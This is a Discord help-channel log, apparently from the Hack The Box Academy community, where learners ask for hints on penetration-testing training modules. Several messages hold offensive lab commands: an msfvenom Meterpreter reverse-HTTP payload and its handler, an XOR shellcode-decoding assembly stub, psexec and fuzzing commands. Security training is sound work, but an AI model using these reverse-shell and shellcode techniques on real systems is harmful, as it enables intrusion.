#modules

1 messages · Page 450 of 1

solid plume
#

Hi I'm doing the Windows Fundamentals - NTFS vs File Sharing Module. I'm connected to the VPN on my virtual machine and have a route to the 10.129.0.0/16 network yet I am unable to ping the target machine on that network. However, I am able to RDP into the machine fine. Does anyone know what the problem could be? I've restarted my machines and vpn connection a couple times with no success.

normal dagger
#

@civic inlet can you please help me on the dacl attacks skills assessment 🫠

lyric bluff
#

Hello

acoustic owl
lyric bluff
acoustic owl
lyric bluff
#

WHAT

#

THE FFF
Found it

#

damm i didnt see that comming nice one

jade frigate
#

Guys, is there some book or even youtube channel to complement the study of the module 'Pivoting, Tunneling, and Port Forwarding' ? I'm okay with the questions and all, but I'm having a little trouble at understanding the full concept of it...

clever helm
#

Hi

static slate
clever helm
#

i am trying to solve the PtC module 2nd question i have been try to get the certificate by using printer bug but i dont know why i am not able to do it like i did create relay server with impacket and then used printerbug.py to authenticate but no luck

robust sun
#

hi, im currently stuck on pass attacks credential hunting in network shares

#

tried different patterns but still to no avail

robust sun
broken star
#

Hey, have a question for the peeps woking on the CPTS. I'm at the File Transfers module. I have been using a VM for everything and this section requires Windows, is everyone using pwnbox or are you actually using a Windows VM?

civic inlet
silk lagoon
broken star
silk lagoon
#

You can rdp in your own VM

broken star
little terrace
#

hi im doing the pivoting and doing it with SSH and proxychains, i used nmap -sT but it doesnt show me any ports are open.
ofc i can use ligolo but is ssh proxychains bugged?

#

i can still xfreerdp but nmap -sT and msfconsole rdp_scanner just doesnt work

fair merlin
#

The same instructions

little terrace
deep hemlock
#
  • 0 What host can this user access via WinRM? (just the computer name)
    Active Directory Enumeration & Attacks
    Page 23
    Privileged Access
    Privileged Access
    how can i get the answer
#

anyone

#

?

#

!help

vestal thistleBOT
#

Bot Messages Empty?
@vestal thistle makes use of message embeds as output for most commands. Please note that having "Link Preview" disabled will not make these embeds show in your client. Enable User Settings → Text & Images → Link Preview → Show website preview info from links pasted into chat. to fix this.

Help :: Generic Help

Hello @deep hemlock~!
Click here to read my online documentation!

Need more help? Join my official support server using this invite: https://discord.gg/cYkHGZ96xf

Here's the list of modules that are available for use in this server:

administration, automoderator, bravefrontier, custreact, forms, help, moderation, permissions, revivedwitch, rss

Use !help (module name) for a list of commands within the specified module.
Use !help (command name) for more details about a command.

Commands Not Working?

Please note that an apparently unresponsive command might be caused by missing, or incorrectly set, module permissions. Refer to the Permissions System documentation page for more info!

In order to understand whether permissions are the root cause of a non-working command, you can enable verbose mode for yourself with !verbose. These messages are always sent via DM, and this mode is configured on a personal basis.

Direct Messages Not Working?

In order to avoid having issues with using the Direct Messages-related commands (most importantly, the Forms Submissions), make sure you have "Allow direct messages from server members" active in this server's "Privacy Settings" and/or in your "User Settings". Refer to the image below for more info.

deep hemlock
#

hello anyone

#

nobody even replying

waxen totem
deep hemlock
ocean night
#

The information needed to complete that is within the module and sections

#

It is above a Tier 0 module, so spoilers should not be shared

#

(look at the pinned channel message)

opal shuttle
ocean night
#

Staff and moderators are not here beck and call to help with content, sorry

opal shuttle
#

@ocean night i think htb should need to reorder some modules

#

of cpts path

ocean night
#

Fair, some modules do require you to use your imagination and resourcefulness

#

The ability to learn, adapt and research.. it's a fundamental skill

#

If we gave all the answers flat out in each section, there would be no challenge at all

opal shuttle
ocean night
ocean night
#

The first few modules in the path do cover many basics I think?

#

Again, I'm not saying you are wrong

opal shuttle
#

i dont think so

ocean night
#

I would love to hear feedback

opal shuttle
#

i am open to explain extensively with examples...

#

should i dm you ?

ocean night
#

That is the place for Academy feedback for things like this I believe

opal shuttle
#

ok

ocean night
#

I can then follow up afterwards, unless someone beats me to it

#

Thank you!

opal shuttle
#

no problem

deep hemlock
opal shuttle
deep hemlock
#

yes its not working

opal shuttle
#

umm

#

i dont remember that one its a long time i have done that

#

you can dm me

#

share me link

ocean night
robust sun
#

can anyone give me a nudge on pass attacks "Credential hunting in network shares"?

ocean night
#

Appreciate you ignoring me, thanks @deep hemlock

#

Have a LOVELY DAY

open wyvern
#

someone help me with lab in module Password Attacks/Pass the Certificate lab im really stuck on the administrator flag

ocean night
#

@open wyvern a little manners goes a long way, but keep in mind that module you are asking about is above Tier 0, just like I said for another query a little bit above.. and as it says in the pinned message

#

So please take any assistance you get to DMs.

storm elk
#

You can dm me @open wyvern (just you)

robust sun
#

no one wants to help me 😭

#

looks like being rude is key 🤣

storm elk
#

sure @robust sun , you can dm me too

#

tell me everything you got

safe dock
#

Any teams for holmes ctf

ocean night
#

This is for Academy modules

storm elk
ocean night
#

👆

safe dock
#

Thanks

torpid inlet
#

Hi, could someone please give me a hint for the Skill Assessment for Insecure Output Handling Module in the AI Red Teaming Pathway? I have been going at it since 2 days and haven’t gotten anywhere

rustic sage
storm elk
#

did you... ssh into the machine like instructed?

#

(seen a few people miss this part)

rustic sage
#

i like lost what the creds were, if i can get trhe creds i can do the task

storm elk
#

the credentails are in your question

rustic sage
#

but when it prompts u the pass to do the secretsdump.py it just doesnt work

#

this is a violation 3 people laughing at me i feel humiliated 💀

storm elk
#

might need to do another step first

gray yacht
rustic sage
gray yacht
rustic sage
#

thats the thing the previous section in the module was without creds

#

so now i dont even know 😭

gray yacht
digital pendant
#

I ran into that same issue. Previous section of the modules credentials were needed, didnt say it in the next section.

severe eagle
#

Hey guys on the thick client applications module and got the fatty-server but says corrupt followed exact instructions anyone else having this issue??

#

PleSe someone respond spent days dealing with this module on slow internet as well

#

someone must of done this just need some help b4 time runs out starting again for 100x time

severe eagle
#

Anyone on here done this module please direct message me the instructions for this module are wrong not accurate I have spent hours and hours I always direct message people helping them so please do same im 95% complete so this is very fustrating

severe eagle
#

you completing the Linux priv esc module?

digital pendant
#

Yeah

severe eagle
#

wil dm ya

teal nexus
ivory sandal
#

hello,

Does anyone have issues starting academy instances ?

#

it keeps loading

cosmic radish
#

For anyone that has the same problem with inetsim exedcutable on their own vms, it worked on parrot for some reason

mystic solstice
hearty forge
ivory sandal
#

type shit

gaunt oyster
#

Does anyone know how to change tje port bloodhound runs from? Default is 8080.

#

I m using a kali vm and i just run bloodhound and it spins up

#

But want to change the port it starts from

median gale
#

Trouble spawning any target at any section / module . Any help ? Tried switching vpn servers with no luck

ivory sandal
#

good to know

plain summit
#

Is HTB Academy Down?

bronze lodge
#

10 min ago I guess

median gale
#

Do they know about it though ?

bronze lodge
#

ping them!!

warm tartan
#

Hi, quick question is there any courses or modules on reverse? I know there is intro ASM and Malware Analysis are they complete?

median gale
digital pendant
#

spinning wheel of death

#

ive changed VPN, didnt change

ivory sandal
#

also, why my name is jordan mc verify

digital pendant
ivory sandal
#

I recognize that i totally skip rules and welcome channel

digital pendant
bronze lodge
#

yep confirmed

autumn garnet
#

has anyone completed "Introduction to Windows Evasion Techniques" im stuck at the Dynamic Analysis, none of the bypasses work for me

ivory sandal
#

my username also changed

digital pendant
ivory sandal
#

niiice

red fossil
#

Hello! I'm steezboy, I joined this server to connect with people because I easily get bored at home since I'm finally done with my exam. Hoping to make some friends here amd looking forward to have a nice time. Nice to meet you'll 🤝

red fossil
raw adder
#

nice

#

..

tranquil wren
#

Hello, i am currently on the credential hunting in linux module in https://academy.hackthebox.com/module/147/section/1320. I downloaded lazagne, and installed it on my attack box using pip, and then transfered it the remote target successfully, however, when I try to run python3 lazagne.py all, i am getting a SytnaxError: Non-UTF-8 code starting with '\x9a' in file laZagne on line 2, but no coding declared'. Should I installing this a different way on the target machine or am i missing something?

gray yacht
#

@red fossil @raw adder welcome to the server, if you haven't already check out #welcome and the #rules and for general chit chat move things over to #general as this channel is for assistance with HTB Academy modules and not a general channel for chatting.

red fossil
gray yacht
grand timber
tranquil wren
gray yacht
tranquil wren
#

what is the wget command for that? i tried -r and it started transferring everything from my attack box it looked like

tranquil wren
#

that worked, thanks

plain summit
#
Linux Privilege Escalation Kernel Exploits

I get this error when trying to run the exploit on the ssh machine:

/lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found
rose lagoon
#

Hello I'm stuck in the LinuxPRIVESC module I have to enum and finds some files can somone give a hint pls ?

plain summit
gaunt kite
#

anyone facing issue in accessing module labs?

grand timber
gaunt kite
grand timber
#

Okpz

#

Thanks

grand timber
broken moss
#

for the HTTP attacks, I'm looking at request smuggling section. I can't seem to get Burp's HTTP Request Smuggler extension to identify any of those vulnerabilities, even the first lab which is a CL.TE. Does anyone use that extension or have better ways of finding smuggling quickly?

lyric bluff
#

Skills Assessment - WordPress

i need help with this please

for Q3:+ 3 Submit the contents of the flag file in the directory with directory listing enabled.
am not sure how to do it i been manually moving throught the dir for the past hour and i dont think thats the right way

https://academy.hackthebox.com/module/17/section/64

crude parrot
#

Hey, I'm working through the SQL injection fundamentals module, and have run into an issue where the exercises won't respond to my inputs. The page just loads indefinitely. Is it a bug, or am I doing something wrong?

#

It's occurred across several exercises, and I've tried copying generic queries from the lesson and still had the same problem.

#

It will also respond to legitimate inputs, and throw syntax errors. The issue only comes up when I actually try to inject a query.

brave field
haughty fiber
#

AD enumeration and attacks SA part II Q4. I'm unable to find the user and password and looked at writeups, is there a method to find the password or is it just guesswork.

crude parrot
#

problem solved i guess

wraith palm
#

Hi

fathom pendant
plain summit
#
Linux Privilege Escalation Python Library Hijacking

After putting in the two scripts into the python file using vim, I get this error when trying to run the file itself:

Traceback (most recent call last):
  File "/home/htb-student/mem_status.py", line 2, in <module>
    import psutil 
  File "/usr/local/lib/python3.8/dist-packages/psutil/__init__.py", line 25
    from __future__ import division
    ^
SyntaxError: from __future__ imports must occur at the beginning of the file
fathom pendant
#

doesn't make it ok.

haughty fiber
fathom pendant
haughty fiber
#

oh

fathom pendant
fathom pendant
#

"Use a common method to obtain weak credentials" this q right? @haughty fiber

weak vapor
#

hey there is this question I've been stuck with for so long and it's getting boring

#

How many services are listening on the target system on all interfaces? (Not on localhost and IPv4 only)

#

I'm almost done with the Linux Fundamentals module and yet I can't solve this one, not even with the help of ChatGPT

fathom pendant
#

most tools (like netstat) have an option to only select IPv4

weak vapor
#

yep that's what I've been trying

#

wait I'm supposed to find IPV4 only??

fathom pendant
#

localhost: any ip in the range of 127.0.0.1 -> 127.255.255.255

weak vapor
#

but the question specifically says all interfaces

fathom pendant
#

all interfaces (Not on localhost AND IPv4 ONLY

#
  • NOT localhost
  • ONLY IPv4
#

it's in the brackets

weak vapor
#

that was unclear 🤦‍♂️

fathom pendant
#

reading the whole question can be helpful, but i can understand how it can come across

#

imo the order of operations should be flipped (IPv4 only and Not on localhost)

weak vapor
#

well the answer is till wrong 🙁

fathom pendant
#

are you ssh into the target system?

weak vapor
fathom pendant
#

so you see htb-student@...$ ?

#

(i.e. you did ssh htb-student@ip)

weak vapor
#

yep, htb-student@nixfund:~$

#

so I am in the target system

fathom pendant
#

sometimes you may need to use grep to filter out even more info

weak vapor
#

and I am not counting the header (first line of output)

fathom pendant
#

pro tip: remove the pipe to wc -l at the end

weak vapor
#

why remove it?

fathom pendant
#

so you can see what you're receiving before it's going out to count

#

it allows you to check what you could be missing

#

grep -v can be useful as well

weak vapor
#

well I see what I'm receiving, but the problem is I don't understand it all 🙃

fathom pendant
#

(-v is reverse grep, meaning it selects everything that isn't the pattern you provided)

#

dm me

ionic hedge
fathom pendant
#

it's also a case of breaking down the question

#

which isn't an easy skill tbqh

fathom pendant
ionic hedge
#

I found the answer only after counting them manually, lol. I thought the proper flag for "listening" was enough to get the listening services... But apparently not, that last netstat column "state" got me

fathom pendant
#

it is somewhat of a guessing game (at least with weak passwords) but the module gives you an idea of what one may look like iirc

haughty fiber
#

ight

bleak knoll
#

sorry for a stupid question, but why doesn't my module eat this answer

swift dove
#

see how its mention in the module sometime "-" makes it wrong

swift dove
#

What module is this ?

acoustic owl
bleak knoll
swift dove
#

BTW, anyone doing the module AI DATA ATTACKS, I highly suggest to use Google Collab notebooks, with GPU runtime (you'll save a ton of time) and it's free 🙂

bleak knoll
potent plank
#

i am currently studying in the cbbh plan and specifically in the file inclusion module (Log poisoning section), i was trying out the server log poisoning method but when i inject the web shell and try to call it i don't get any output at all. Could someone help me figuring it out?

Thanks in advance

fathom pendant
#

it's in the reading

potent plank
#

the session poisoning method worked, but i wanted to try log poisoning but i can't get it through (i have solved the question but i cant use the log poisoning way)

fathom pendant
#

make sure you utilize the proper quote type to not break the log

tranquil wren
#

Hello, i am currently on the credential hunting in linux module in https://academy.hackthebox.com/module/147/section/1320. I found the passwd.bak and shadow.bak files for theuser account for will. I have http.server running on the target and am able to see the files, it lets me download the passwd.bak file but not the shadow. i have tried the browser path and then tried wget from my attack box. It gives an error for that file on both. Anyone have a minute to help?

potent plank
tranquil sluice
#

In the "intro to white box pentesting" -> command execution task.
Should I not be able to run a curl command on the target machine? it works on my own local machine yet when using the same payload it freezes the target

wild sage
#

Is there some who I can dm about trying to get Suricata to generate fast.log on the Skills Assessment. Module: Working with IPS/IDS, Section Skills Assessment: Suricata. I have the answer already, but I'm trying to generate the log to help understand how it all works

potent plank
abstract talon
#

Question about the intro to assembly language skills assessment (test 2). Is it normally that the given code doesn't even print the flag? (I created a flg.txt file to test if the code works before trying it on the target, but it never prints the flag.)

#

Is that normal and we are supposed to not only make the file smaller, but also change it so that it works in the first place?

jade frigate
#

guys, can somebody explain to me if I'm doing something wrong or is the third target machine that is actually down?

jade frigate
cloud urchin
jade frigate
#

So I had to manually input a rule to mstsc.exe to use the config I did before, then it worked

spark jetty
#

Hi community, I am mew in this world, I have questions, someone can explain me how make the question #2 and #3 of system information of Linux fundamental, sorry for my English, I'm just learning

rustic sage
#
  1. Break it down to smaller problems
rustic sage
wild verge
limber surge
#

Hello with regards to Pivoting / Tunelling module of CPTS . i am not able to get the Meterpreter session established. just wonder if there is any error in my multi/handler.

use exploit/handler
set payload windows/x64/meterpreter/reverse_https
set lhost 0.0.0.0
set lport 8000
run

For the msfvenom payload when i created, this is what i use.
msfvenom -p windows/x64/meterpreter/reverse_http lhost=172.X.X.X -f exe -o backupscript.exe LPORT=8080

hollow kernel
#

Did You send the exe to the target?

#

You need to run the multi handler and then run the exe un target

limber surge
hollow kernel
spark jetty
broken moss
#

http attacks TE.CL is getting me good

#

Definitely not a clear explanation on the section either. Required other writeups of TE.CL attacks to figure out why this writeup was doing what it was. But apparently still not enough to understand it enough to get the flag

viral slate
#

Module: whitebox attacks
Section: skills assessment

Hello everyone!
Got stuck on this task.
Can I have some help?

obtuse wasp
#

Sorry mate, I'm into the HTB JCA certificate so I can't help u

digital pendant
#

anyone around for a nudge pls on LogRotate, linux priv esc module. Confusion is real

full seal
#

hello

jolly lion
#

M

rustic sage
#

làm sao để chat được với các đoạn chat khác vậy

autumn pilot
#

english only please

rustic sage
#

sorry

#

how to text in general chat

autumn pilot
swift dove
# lapis plinth do i need a high level GPU?<:fingerguns:589118464162005017>

If you do it on your computer, i think the module says it could take a little bit to train some of the models depending on your computer. But it was done on a MacBook Air M1 and apparently it took around 15 mins. I ran it on Google Collab with a GPU runtime (again, fully free), and the trainings took 5 - 10 seconds 🤷‍♂️

tough wing
#

In the section "Constrained Delegation from Linux," I encountered the following issue in the final step:
And this is my /etc/hosts:
10.129.205.35 inlanefreight.local inlanefreight
10.129.205.35 DC01.inlanefreight.local DC01
Can someone please help me?

psexec.py -k -no-pass INLANEFREIGHT.LOCAL/administrator@DC01 -debug
Impacket v0.13.0.dev0+20250828.31428.57693365 - Copyright Fortra, LLC and its affiliated companies

[+] Impacket Library Installation Path: /Users/lengjing/Library/Python/3.9/lib/python/site-packages/impacket-0.13.0.dev0+20250828.31428.57693365-py3.9.egg/impacket
[+] StringBinding ncacn_np:DC01[\pipe\svcctl]
Traceback (most recent call last):
File "/Users/lengjing/Library/Python/3.9/lib/python/site-packages/impacket-0.13.0.dev0+20250828.31428.57693365-py3.9.egg/impacket/nmb.py", line 905, in _setup_connection
sock.connect(sa)
socket.timeout: timed out

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
File "/Users/lengjing/Library/Python/3.9/lib/python/site-packages/impacket-0.13.0.dev0+20250828.31428.57693365-py3.9.egg/EGG-INFO/scripts/psexec.py", line 125, in doStuff
File "/Users/lengjing/Library/Python/3.9/lib/python/site-packages/impacket-0.13.0.dev0+20250828.31428.57693365-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 1359, in connect
return self._transport.connect()
...
File "/Users/lengjing/Library/Python/3.9/lib/python/site-packages/impacket-0.13.0.dev0+20250828.31428.57693365-py3.9.egg/impacket/nmb.py", line 908, in _setup_connection
raise socket.error("Connection error (%s:%s)" % (peer[0], peer[1]), e)
OSError: [Errno Connection error (DC01:445)] timed out
[-] [Errno Connection error (DC01:445)] timed out

#

Can someone please help me?

storm elk
#

@tough wing please try to switch DC01 and DC01.inlanefreight.local in order in /etc/hosts

tough wing
storm elk
#

what if you combine the two lines into one? Just saw you had two lines for the same IP

last bronze
#

Into to Binary Exploitation
Skill Assessment
Task 1 :
Disassemble 'loaded_shellcode' and modify its assembly code to decode the shellcode, by adding a loop to 'xor' each 8-bytes on the stack with the key in 'rbx'.

I am using this code not getting the shell code

global _start

section .text
_start:
mov rax,0xa284ee5c7cde4bd7
push rax
mov rax,0x935add110510849a
push rax
mov rax,0x10b29a9dab697500
push rax
mov rax,0x200ce3eb0d96459a
push rax
mov rax,0xe64c30e305108462
push rax
mov rax,0x69cd355c7c3e0c51
push rax
mov rax,0x65659a2584a185d6
push rax
mov rax,0x69ff00506c6c5000
push rax
mov rax,0x3127e434aa505681
push rax
mov rax,0x6af2a5571e69ff48
push rax
mov rax,0x6d179aaff20709e6
push rax
mov rax,0x9ae3f152315bf1c9
push rax
mov rax,0x373ab4bb0900179a
push rax
mov rax,0x69751244059aa2a3
push rax
mov rbx,0x2144d2144d2144d2

mov rdx, rsp          
add rcx, 14         
sub rsp,8
call decode_loop

decode_loop:
xor [rdx], rbx
add rdx, 8
loop decode_loop

tough wing
last bronze
leaden island
#

yo guys im on web fuzzing using ffuf

#

im trying to fuzz a GET parameter

#

im using this command ffuf -w /opt/useful/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u http://admin.academy.htb:PORT/admin/admin.php?FUZZ=key

#

ive set an ip for academy.htb in /etc/hosts (made sure its same as the live target)

last bronze
#

add admin.academy.htb also

leaden island
#

but im not getting any 200 OK response

leaden island
last bronze
#

First add it and try

flint palm
tranquil sluice
#

can I get a sanity check for the skill assessment in the "intro to whitebox pentest"? I'm using one of the course attacks, it works in the debug machine but not on prod

zinc relic
#

Ive begun the penetration testing path but am wondering wether there are any modules I should complete before this (i finished learning one )

spring root
#

working on Active Directory LDAP module on the second to last section. I have a problem with finding user account that requires a smart card for interactive logon? Can someone help me out

limber fog
#

Hey !
In Linux privesc, I just finished the "Escaping restricted shells" section, yet I don't understand how what I did worked. Anyone available to mp & answer this question plz ?

gray yacht
spring root
gray yacht
clever helm
#

Hello,
I got ask a doubt why is the pawn box slow I am currently doing password attacks last assessment I got into DMZ01 and further enumerated find the password and try to use proxy chain for further enumeration of other given hosts but when I checked it’s all filtered

#

Is it my issue or the lab supposed to be like this

#

Do we need to evade firewalls ??

gray yacht
spring root
# gray yacht UAC attributes

can i get a hit for the last question "What is the userAccountControl bitmask for NORMAL_ACCOUNT and ENCRYPTED_TEXT_PWD_ALLOWED? (decimal value) "

gray yacht
clever helm
gray yacht
clever helm
grave mulch
#

sup

fossil knoll
#

Hello, I'm stuck at Active Directory Enumeration & Attacks [module] Access Control List (ACL) Abuse Primer [section]. The second question Which ACE entry can be leveraged to perform a targeted Kerberoasting attack? is driving me crazy i've tried all possible answers that make sense and no result. Can someone maybe help me with answer format?

gray yacht
fossil knoll
broken star
#

Kinda random not exactly module related but not sure where to ask but... Has any else had issues with burp in vmware fusion?

blissful plume
#

In the footprinting module, SMTP question 2, is there any prob with the footprinting resource? specifically the wordlist?

#

I tried using msf, nmap, smtp-user-enum'

fathom pendant
#

isn't there a given wordlist in the resources button?

blissful plume
#

but still....

digital pendant
#

There was last time.

blissful plume
#

i downloaded tht

#

not working 101 entries and no results

fathom pendant
blissful plume
#

Oh heck!

#

I didn't read the hint carefully

#

srryy, lemme try again

fathom pendant
#

i don't recall if the help context menu is messed up or not but i believe it's -w or -W for the timing

blissful plume
#

once again a big sorry, msf worked!!

#

so sorry :' (

tranquil wren
#

Hello, i am on the attacking ftp module (https://academy.hackthebox.com/module/116/section/1165) and i have successfully used medusa to gain credentials and log into the ftp server, and exported the flag in that user name. the module won't accept the flag or the user for the ftp server, would there be multiple correct users and flags for this module or a rabbit hole? i still have medusa running but it hasn't found anything else yet and has been running for an hour. Anyone have any idas

fathom pendant
tranquil wren
#

ah okay, it HTB{S...9} so it must be for something different

limber fog
#

Hey, in Linux privesc, is the module for "Privileged groups" buggy ? It talks about NXC & Docker, idk if that's the intended content ?

gray yacht
west arrow
#

Anyone else on M1 mac (Armm64), How do you use gcc to compile exploits for target x86_64 linux architectures ?

limber fog
gray yacht
gaunt forge
#

anyone one else get through Introduction to Windows Evasion Techniques static analysis? the log detects that my payload isnt triggering defener but its still not giving me the flag. [09/09/2025 09:41:38] Checking...
[09/09/2025 09:41:39] C:\Alpha\Static\real.exe - OK - Undetected by Microsoft Defender Antivirus
[09/09/2025 09:42:39] Checking...
[09/09/2025 09:42:39] C:\Alpha\Static\real.exe - OK - Undetected by Microsoft Defender Antivirus
[09/09/2025 09:43:38] Checking...
[09/09/2025 09:43:39] C:\Alpha\Static\real.exe - OK - Undetected by Microsoft Defender Antivirus
[09/09/2025 09:44:39] Checking...
[09/09/2025 09:44:39] C:\Alpha\Static\real.exe - OK - Undetected by Microsoft Defender Antivirus

cloud urchin
gaunt forge
rain mirage
#

the module: password attack , Attacking Active Directory and NTDS.dit

question: On an engagement you have gone on several social media sites and found the Inlanefreight employee names: John Marston IT Director, Carol Johnson Financial Controller and Jennifer Stapleton Logistics Manager. You decide to use these names to conduct your password attacks against the target domain controller. Submit John Marston's credentials as the answer. (Format: username:password, Case-Sensitive)

idk y i cant find the user even if i turn the case sensitive mode on while mutating the wordlist . any hints ?

gaunt forge
cloud urchin
#

It works fine

gray yacht
rain mirage
#

Ya just to be clear here is what I did , converted the given names to common format with the help of the tool , then ran kerbrute with the list and made it case sensitive , any mistakes ?

gray yacht
digital pendant
#

Can anyone help diagnose lab issues? it is my own parrot box, stopping me from working on a module. I could use pwnbox but prefer it that I don't have to switch between the two for the exam when I get round to it

#

Context... I can't gcc compile any exploits from my box.

cedar blaze
strong acorn
#

Hey I am kinda stuck on this question in "SOC Analyst: Security Monitoring & SIEM Fundamentals/SIEM Visualization Example 4: Users Added Or Removed From A Local Group (Within A Specific Timeframe)" I think I followed the instructions as intended and nothing seems to yield the answer to that question

full patio
quiet sandal
#

Sub-domain Fuzzing

full patio
#

Is anyone else unable to access the Support Bubble in the bottom-right corner?

#

I've got ad-block switched off

swift dove
#

Hey guys, let me know if this is not the right place, but I think it's related to modules enough. I'm close to finish the AI Red Teamer Job path. I've loved the prompt Injection and llm output attack modules, insane, 10/10 material right there. I'm looking to go deeper and wanted to know if you had ressources to share to keep training in a practical way just like we do in the assessments from the modules. Thank you for the help, I'm already checking on my side but struggle to find playgrounds to apply what I've learned so far 🙂 THANK YOU!

digital pendant
digital pendant
#

ordinarily I would but gcc is not installed it says

fathom pendant
#

I believe theres also the --static flag

digital pendant
#

just went to check if I can compile on target;

This is on the skills assessment but some of the lab machines also were the same

#

oh right not sure what static flag you're referring to, ill have a look at the man page I guess?

digital pendant
#

ooh okay so I need the local archive libraries instead for that to work but it could do.. ill give it a go thank you

runic summit
#

Anyone free to talk about the Windows Lateral Movement Skill Assessment?

desert widget
#

Who all are preparing for CPTS rn?

#

I need some guidance on it

#

I am cooked fr

#

Pls dm me

digital pendant
clever helm
#

Hello

#

I got a doubt with this password attacking module intro to JTR
What where is rolf’s password

#

Is their something missing

fathom pendant
#

and yes you need the WHOLE line

clever helm
#

Okie dokie

plain summit
#
Web Attacks Chaining IDOR Vulnerabilities

The flag does not show up after sending the correct changes and refreshing the page.

icy egret
#

Please DM me, i am stuck for quite long, restarted VM for 6 times, changed VPN, researched, nothing seems helpful

fathom pendant
#

@icy egret don't spoil module information

icy egret
#

oh, my bad

#

but why am i not getting .bat ?? even though everything is followed with module, perms changed , inheritance done, restarted the .exe

civic inlet
#

will there be a skills track for wifi or no?

snow badge
#

Hey, I'm looking for help on https://academy.hackthebox.com/module/158/section/1439. This is where I am in the instructions:

"We will need to transfer SocksOverRDPx64.zip or just the SocksOverRDP-Server.exe to 172.16.5.19. We can then start SocksOverRDP-Server.exe with Admin privileges."

I'm currently using xfreerdp to connect to my target host, which is using mstsc.exe to connect to the remote host 172.16.5.19. I'm trying to copy and paste SocksOverRDP-Server.exe from the target host to 172.16.5.19, and it's not allowing me to do so. I was able to accomplish this last night, but the target reset before I could finish. I've tried stopping and restarting the rdpclip process on the remote host, and restarting mstsc.exe. Any suggestions?

SOLVED:
I restarted the target, started over from the beginning of the section, used the mstsc.exe that comes up in search results rather than C:\Windows\System32\mstsc.exe (didn't check their locations to see if they were different), and did a manual copy paste of the file. It worked this time.

vocal crane
#

Hey is there some issues with this question,

Which architecture is known for decentralized data sharing without a central server?
Ans-P2P Architecture

snow badge
vocal crane
#

Network Foundations

fathom pendant
snow badge
#

Can you link the section? And what's the issue? Your answer P2P Architecture is not accepted?

spark jetty
vocal crane
fathom pendant
#

a-to-a for instance

vocal crane
#

yes i tried that as well peer-to-peer

fathom pendant
#

did you try without the word "Architecture"

#

:)

vocal crane
#

nice that works thanks alot

snow badge
#

lol

spark jetty
fathom pendant
#

i suggest looking into the commands that are given to you by the module

#

iirc the module gives you a list of common commands

spark jetty
fathom pendant
#

/home/ however

#

but it sounds like you're not ssh into the target

#

ssh htb-student@spawnedIP (spawnedIP is the IP that spawns from "Click Here To Spawn Target!")

#

spawn instance starts the in-browser pwnbox which is NOT the target, it's just an in-browser attack box you can use instead of your own vm

spark jetty
#

For find paths

vernal badger
#

Hi everyone, I am taking part in "Pivoting,Tunneling and Port Forwarding" Module, but the problem I faced is proxychains works on xfreerdp but failed to scan ports with nmap in target host. The nmap command I use "proxychains nmap 172.16.5.35 -Pn -sT" but the result shows ignored which is different with the tutorial sample. Did anyone faced the same problem?

vernal badger
#

Noted, will try it later and thanks for replying.👍

plain folio
vernal badger
rustic sage
#

Does anyone have a module relating to bloodhound

eager spindle
rustic sage
opal shuttle
waxen totem
little terrace
#

hi im doing RDP and SOCKS Tunneling with SocksOverRDP and the rdp for the dc, the second hop, doesnt work

rustic sage
#

is there a way to color code my report for sysreptor so it can be clear?

worn cape
#

Hello

In the CPTS Documentation and Reporting Module. The course resources has a Sample Obsidian Note Book how do i open this in Obsidian. There is no Open Folder or Directory option i can see.

rustic sage
#

im tryna make it look better

waxen totem
rustic sage
#

like text

waxen totem
rustic sage
waxen totem
#

You can also do inline code blocks `like so`: like so

rustic sage
#

o

#

cant i just take my report in microsoft word and colour it?

waxen totem
#

I don't know, I didn't really care how my report looked, I more so cared about the content

rustic sage
#

oh okay

shell drum
#

Hi everyone 👋

I’m Shaheer, aka Maverick, from Pakistan 🇵🇰.
I’m here to connect with like-minded folks in penetration testing, exploit development, and red teaming.

I mainly focus on malware development (maldev) and Windows exploitation. I’m still a learner, not formally certified yet, but I’ll be attempting CRTO this month and then moving towards some OffSec certs.

Looking forward to sharing knowledge, learning from you all, and geeking out on offensive security together! 🚀

waxen totem
icy egret
earnest jacinth
shell drum
#

Didn't knew sorry for that

#

I'll keep that in mind next time

rain mirage
#

module password attack : Attacking Active Directory and NTDS.dit
On an engagement you have gone on several social media sites and found the Inlanefreight employee names: John Marston IT Director, Carol Johnson Financial Controller and Jennifer Stapleton Logistics Manager. You decide to use these names to conduct your password attacks against the target domain controller. Submit John Marston's credentials as the answer. (Format: username:password, Case-Sensitive)

i just wanna know which wordlist do i use ,, (if ur answer is rockyou then there are multiple rockyous , so)

umbral hamlet
#

Any staff can contact me regarding HTB Business CTF writeup prizes? We haven't heard back for a couple of months now 😓

#

I tried messaging author and they pointed me to panawesome and makelariss but nobody responded at all. I think they forgot about business CTF haha

acoustic owl
#

@fair hornet @rustic rain ^

tranquil wren
#

Hello, i am on Q3 of the Attacking FTP module (https://academy.hackthebox.com/module/116/section/1165), i was able to find the other user name by file traversing but when i use hydra or medusa along with the pw list available in resources or try to run it with 'rockyou' I am not finding it. when i run the user list and the pw list together with hydra or medusa it only finds one user name and password and it isn't the correct one for the module, i actually think it was for a different module probably as i found the flag with the other user name. Can any one give me a nudge?

limber river
#

<@&861185840277487616>

icy dagger
#

Hello everybody, I am on “Uncovering 2FA Token Exploitation” from the Android Application Malware Analysis module. I’ having troubles interpreting the angr output. Can I ping someone who solved it for some help? Thx in advance 🙏🏻

autumn garnet
#

I have the same issue. Did you ever figure it out?

autumn garnet
desert inlet
#

Hey everybody! I have a question on the advanced sqli module, the skill assessment module to be precise.
I was able to find the first injection point but I couldn’t excteact the password. Looking at the solution to get some hint I found that I have to search specifically for passwoRd and every other variant won’t work. Why is that? What have I missed?

haughty fiber
#

Powerview modules are not being recognized even after importing

#

tried through evil win and meterpreter

tranquil wren
mint bridge
#

Hey can anyone help me out with an openvpn issue? (Sorry this is the only channel it lets me talk in)

tranquil wren
#

sorry i'm not following

tranquil wren
gray yacht
tranquil wren
#

i tried an ftp bounce but it didn't seem to take, i've had to reset those machines alot becuase the ftp service does seem to want to start in that module for some reason

gray yacht
hasty mauve
#

Umm, why my messages got deleted?

tranquil wren
#

lol

gray yacht
tranquil wren
gray yacht
# hasty mauve Oh, sorry lol.

All good and I believe there is a user in a group or something, which wouldn't have shown up with the user search.

gray yacht
tranquil wren
#

goddamn it

#

thanks @gray yacht

glossy turtle
#

Hii im a beginner to cybersec installed kali rn. What should i be doing now? Is learning python a good next step?

